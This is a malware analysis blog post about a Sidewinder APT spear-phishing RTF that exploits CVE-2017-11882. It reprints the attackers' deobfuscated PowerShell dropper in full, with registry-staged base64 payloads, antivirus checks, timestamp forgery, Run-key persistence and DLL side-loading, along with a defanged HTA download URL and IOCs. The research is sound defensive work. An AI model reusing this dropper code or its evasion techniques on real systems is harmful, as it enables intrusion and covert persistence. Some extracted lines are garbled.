# APT Sidewinder: Tricks powershell, Anti Forensics and execution side loading **[medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c](https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c)** Sebdraven July 17, 2018 [Sebdraven](https://medium.com/?source=post_page-----5bc1a7e7c84c--------------------------------) Jul 16, 2018 7 min read ## Spear phishing I’ve started few days ago an analysis on a RTF following my recent researches. I found it this: 892859ea9d86fc441b24222148db52eb33cd106c2ac68eafbe83ab0064215488 I execute rtfobj on it and two ole embedded objects malforfed: But rtfobj extracts succeffully two raws objects: The object 6A2A1 is very interesting: and this one: In fact, the ole object is a exploit of CVE-2017–11882. The implementation is a bit different than my last article, there is not an object MTF. [The implementation has many matching with the public exploit: https://github.com/0x09AL/CVE-2017-11882-metasploit](https://github.com/0x09AL/CVE-2017-11882-metasploit) The exploitation is the following: an hta is downloaded here and lauched by msthll.dll.RunHMLApplication. caller.exe [hxxp://www.google.com.d-dns.co/includes/686a0ea5/-1/1223/da897db0/final.hta](http://www.google.com.d-dns.co/includes/686a0ea5/-1/1223/da897db0/final.hta) ----- e ta s a o po e s e, bsc pt a d ja asc pt ## Installation of payload and Persistance The installation of the payload made by vscript a line 151 objWSS.RegWrite “HK”&”CU\Softwa”&”re\Updater\pa”&”rt3", bnm, “REG_SZ” here tst = getProfile(“0”) & “$c=”””&c&”””;$m=”””&m&”””;”& Base64Decode(objWSS.RegRead(“HKEY_CURRENT_USER\Softwa”&”re\Updater\pa”&”rt3")) & getProfile(“1”) objWSS.run “powershell.exe -ExecutionPolicy Bypass -Command “”” & tst & “”””, 0, true and here: objWSS.RegWrite “HKCU\Software\Updater”, “” objWSS.RegWrite “HKCU\Software\Updater\part1”, p1, “REG_SZ” objWSS.RegWrite “HKCU\Software\Updater\part2”, p2, “REG_SZ” The registry is used like pivot. p1, p2 and bnm are three blobs of base64 data. bdm decoded is: iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(“””U2V0LUV4ZWN1dGlvblBvbGljeSAtRXhlY3V0aW9uUG9 There is a new base64 block decoded: ----- Set ecut o o cy ecut o o cy ypass Scope Cu e tUse o ce; $ErrorActionPreference=’SilentlyContinue’; $pname36 = “3” + “60Tr” + “ay” $binDir = [Environment]::GetFolderPath([Enum]::ToObject([System.Environment+SpecialFolder], 35))+ “\” + “Winset\Config” + “\”; $bin = “Winset.exe”; try{ $cmdLine = ([int]$c).toString(“00000000”)+([int]$m).toString(“00000000”); $cmdLine = $bin+ “ “ +$cmdLine; } catch{ $cmdLine = $bin; } $line = new-object byte[] 64; $buf6 =[Byte[]] (,0x23 * 64); $cbytes = [system.Text.Encoding]::ASCII.GetBytes($cmdLine); [array]::copy($cbytes,$line,$cbytes.length); $binPath = $binDir + $bin; $binPathdll = $binDir + “cmpbk32.dll”; $dmybinPath = $binDir + “cmdl32.exe”; $rpcdllpath = $binDir + “57146C96.dll”; $run = ‘HKCU:Software\Microsoft\Windows\CurrentVersion\Run\’; $system = ‘HKCU:Software\Updater’; $runExists = False; $pnameavr = “av” + “gn” + “t”; $msvbvmdllpath = $env:WINDIR + “\system32\msvbvm60.dll” $cmdl32path = $env:WINDIR + “\system32\cmdl32.exe” $q36 = Get-Process $pname36 -ErrorAction SilentlyContinue; if($q36){ exit } function dc($s){ sal n New-Object; $data = [System.Convert]::FromBase64String(“H4sIAAAAAAA” + $s); $ms = n System.IO.MemoryStream; $ms.Write($data, 0, $data.Length); $ms.Seek(0,0) | Out-Null; return (n System.IO.StreamReader(n System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); }; function updt($t, $b){ (ls $t).LastWriteTime = (ls $b).LastWriteTime (ls $t).CreationTime = (ls $b).CreationTime (ls $t).LastAccessTime = (ls $b).LastAccessTime } function wb64($path, $b64){ $bytes = [System.Convert]::FromBase64String(“TVq” + $b64); New-Item -ItemType Directory -Force -Path $binDir | Out-Null; [io.file]::WriteAllBytes($path,$bytes) | Out-Null; updt -t $path -b $cmdl32path } function sb($h, $n ) { $len = $n.length; $limit = $h.length — $len; For( $i = 0; $i -le $limit; $i++ ) { $k = 0; For( ; $k -lt $len; $k++ ) { if( $n[$k] -ne $h[$i+$k] ) {break}; } if( $k -eq $len ){return $i}; ----- } return -1; } if((Test-Path $env:WINDIR\SysWOW64)){ $msvbvmdllpath = $env:WINDIR + “\SysWOW64\msvbvm60.dll” $cmdl32path = $env:WINDIR + “\SysWOW64\cmdl32.exe” } try{ if(!(Test-Path $binPath)){ $b64 = dc -s ((Get-ItemProperty -Path $system).part1); $bytes = [System.Convert]::FromBase64String(“TVq” + $b64); $rn = [System.BitConverter]::GetBytes((Get-Random -Maximum 9999 -Minimum 1111))[0..1]; [array]::copy($rn,0,$bytes,$bytes.length — 2,2); New-Item -ItemType Directory -Force -Path $binDir | Out-Null; [io.file]::WriteAllBytes($binPath,$bytes) | Out-Null; updt -t $binPath -b $cmdl32path $b64dll = dc -s ((Get-ItemProperty -Path $system).part2); $bytes = [System.Convert]::FromBase64String(“TVq” + $b64dll); [array]::copy($line,0,$bytes,(sb -h $bytes -n $buf6),64); New-Item -ItemType Directory -Force -Path $binDir | Out-Null; [io.file]::WriteAllBytes($binPathdll,$bytes) | Out-Null; updt -t $binPathdll -b $cmdl32path } Remove-Item -Path $system | Out-Null; Remove-Item $PROFILE.CurrentUserAllHosts | Out-Null; New-ItemProperty -Path $run -Name “Winsound” -PropertyType String -Value $dmybinPath | Out-Null; Copy-Item $msvbvmdllpath $rpcdllpath updt -t $rpcdllpath -b $msvbvmdllpath Copy-Item $cmdl32path $dmybinPath updt -t $dmybinPath -b $cmdl32path $avr = Get-Process $pnameavr -ErrorAction SilentlyContinue if (!$avr) { &($dmybinPath) | Out-Null; } Exit } catch { $_.Exception.Message | Out-Null; } This powershell checks if the AV 360 is installed: $pname36 = “3” + “60Tr” + “ay” $q36 = Get-Process $pname36 -ErrorAction SilentlyContinue; if($q36){ exit } We can imagine the attackers were made a recon step before. The folder where the loadin chain is: $binDir = [Environment]::GetFolderPath([Enum]::ToObject([System.Environment+SpecialFolder], 35))+ “\” + “Winset\Config” + “\”; The powershell copies: $msvbvmdllpath = $env:WINDIR + “\system32\msvbvm60.dll” $cmdl32path = $env:WINDIR + “\system32\cmdl32.exe” Copy-Item $cmdl32path $dmybinPath ----- Copy te $ s b d pat $ pcd pat So msvbvm60.dll becomes: 57146C96.dll And Winset.exe and cmpbk32.dll are decoded and copied in the same folder. part1 and part2 is the reg key base here $system = ‘HKCU:Software\Updater’;: objWSS.RegWrite “HKCU\Software\Updater”, “” objWSS.RegWrite “HKCU\Software\Updater\part1”, p1, “REG_SZ” objWSS.RegWrite “HKCU\Software\Updater\part2”, p2, “REG_SZ” part1 is big blob of base64 data. Firstly the registry key is retrieve: (Get-ItemProperty -Path $system).part1 after is the function dc is called. function dc($s){ sal n New-Object; $data = [System.Convert]::FromBase64String(“H4sIAAAAAAA” + $s); $ms = n System.IO.MemoryStream; $ms.Write($data, 0, $data.Length); $ms.Seek(0,0) | Out-Null; return (n System.IO.StreamReader(n System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); }; this string “H4sIAAAAAAA” is added at part2 and the data is decoded an $data = [System.Convert]::FromBase64String(“H4sIAAAAAAA” + $s); and unzip: [System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); }; and the Mz header in base64 is added and decoded: $bytes = [System.Convert]::FromBase64String(“TVq” + $b64); and the executable is modified for the last time and copied in $binDir: $bytes = [System.Convert]::FromBase64String(“TVq” + $b64); $rn = [System.BitConverter]::GetBytes((Get-Random -Maximum 9999 -Minimum 1111))[0..1]; [array]::copy($rn,0,$bytes,$bytes.length — 2,2); New-Item -ItemType Directory -Force -Path $binDir | Out-Null; [io.file]::WriteAllBytes($binPath,$bytes) | Out-Null; The dll is decoded, modified and written on disk in the same way: $b64dll = dc -s ((Get-ItemProperty -Path $system).part2); $bytes = [System.Convert]::FromBase64String(“TVq” + $b64dll); [array]::copy($line,0,$bytes,(sb -h $bytes -n $buf6),64); New-Item -ItemType Directory -Force -Path $binDir | Out-Null; [io.file]::WriteAllBytes($binPathdll,$bytes) | Out-Null; updt -t $binPathdll -b $cmdl32path The Trick very important here is : [array]::copy($line,0,$bytes,(sb -h $bytes -n $buf6),64); to modify the dll. If you decode the before the modification you have a dll truncated. before: ----- after: In fact: The powershell modify the dll to add $lines and $lines $line = new-object byte[] 64; $buf6 =[Byte[]] (,0x23 * 64); $cbytes = [system.Text.Encoding]::ASCII.GetBytes($cmdLine); [array]::copy($cbytes,$line,$cbytes.length); and $cmdLine $bin =Winset.exe $cmdLine = ([int]$c).toString(“00000000”)+([int]$m).toString(“00000000”); $cmdLine = $bin+ “ “ +$cmdLine; } like in the dll: .string “Winset.exe -0000000100001223 So we have in the same folder: Winset\Config Winset.exe (part1 modified and decoded)is a fake Windows Security Configuration Editor Command Tool cmpbk32.dll (part2 modified and decoded) 57146C96.dll (vb virtual machine) cmdl32.exe (executable of windows) The powershell change timestamps of files copied: ----- updt t $b at d b $c d 3 pat updt -t $binPath -b $cmdl32path function updt($t, $b){ (ls $t).LastWriteTime = (ls $b).LastWriteTime (ls $t).CreationTime = (ls $b).CreationTime (ls $t).LastAccessTime = (ls $b).LastAccessTime } ## Persistance The persistant is a hkey run very basic with the path of the dll in parameter: $run = ‘HKCU:Software\Microsoft\Windows\CurrentVersion\Run\’; New-ItemProperty -Path $run -Name “Winsound” -PropertyType String -Value $dmybinPath | Out-Null; To reload cmpbk32.dll at each reboot of the system and execute the dllmain of the dll. ## Loading Chain The powershell launch cmdl32.exe (“Connection Manager Phonebook Downloader”) trusted by AV because it’s develloped by Microsoft. this exe used: cmpbk32.dll So when cmdl32.exe is launched cmpbk32.dll is loaded. (in the same directory, side loading) the entrypoint is exectuted. The important part is: ----- The function sub.Winset.exe__0000000100001223_0 launches Winset.exe the real RAT like this “Winset.exe -0000000100001223” ; len=2 Winset.exe is RAT developed in VB6. [You can find an complete analysis here: https://s.tencent.com/research/report/479.html](https://s.tencent.com/research/report/479.html) ## Threat Intelligence We have the TTPs described in Tencent with the same phases. Sidewinder is a Indian Group targeting Pakistan military infrastructure. The content of the RTF is cleary oriented to Navy Pakistani. If we check the infrastructure of the attackers: ----- [We have www.nadra.gov.pk.d-dns.co cleary targetted.](http://www.nadra.gov.pk.d-dns.co/) The nadra is the National Database of and Registration Authority. If you check the metada of RTF, Rashid Memorial is the author of the document. This name is really known by the navy pakistani because “Rashid Memorial Welfare Organization (RMWO) was set up by a group of dedicated retired PAF officers in 1998 in memory of Flt. Lt. Rashid Ahmed Khan, who embraced ‘Shahadat’ on 13th December, 1997 when his aircraft caught fire above a densely populated area.” ## IOCs File RTF: 892859ea9d86fc441b24222148db52eb33cd106c2ac68eafbe83ab0064215488 08b9b5b7592004b8733544df1029e2fc085d82db1ba488a43830df49bbbc73b6 hta: b8cbdb36ccd666adaf2ba3628cc79578d3a05119c71dce1bb16aa39e56dea3cc Executables: 8315956b587032db14ba4e700400dffeaeb4119ef509ecf0df1bb4e80a496b59 (cmpbk32.dll) 13497aab3521abbaa654b51f375114e419b1bb774caa8c67cf52775095b17423 (winset.exe) Sandbox execution: ## 892859ea9d86fc441b24222148db52eb33cd106c2ac68eafbe83ab0064215488.rtf (MD5… ### Interactive malware hunting service. Any environments ready for live testing most type of threats. Without install… ----- app a y u ## Credits: Thanks to Benjamin Piot for exchange about this cases ! -----